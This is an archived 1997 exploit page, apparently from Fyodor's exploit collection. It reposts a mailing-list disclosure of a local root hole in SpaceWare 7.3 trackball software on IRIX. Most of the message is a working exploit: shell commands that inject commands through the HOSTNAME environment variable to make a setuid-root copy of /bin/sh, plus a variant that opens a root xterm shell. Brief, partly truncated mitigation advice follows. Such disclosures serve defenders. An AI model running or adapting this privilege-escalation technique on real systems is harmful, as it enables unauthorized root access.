root bug in spaceware

Description:Root hole in SpaceWare trackball software
Author:"J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Compromise: root (local)
Vulnerable Systems:Presumably any system running spaceware 7.3 v1.0 (probably earlier). I don't know if it is IRIX specific. From the message it sounds like there are likely other holes in the program.
Date:20 August 1997

Date: Wed, 20 Aug 1997 15:53:31 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Subject: SpaceWare 7.3 v1.0


        I guess anyone who's reading this already have noticed (if
        you are playing with a SpaceBall), anyway here it goes:


cp /bin/sh /tmp/sh

echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1


        more information:

        IRIX 6.2
        spaceware 7.3 v1.0 (

        (Obviously, you can use HOSTNAME for any command you want
        to run as root, like
echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball


        a) rm (since does lots of nasty things, like
        running spaceball demos as root, probably this is the best

        b) set HOSTNAME=/usr/bsd/hostname in the "Utilities" section of

    J.A. Gutierrez
    finger me for PGP

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: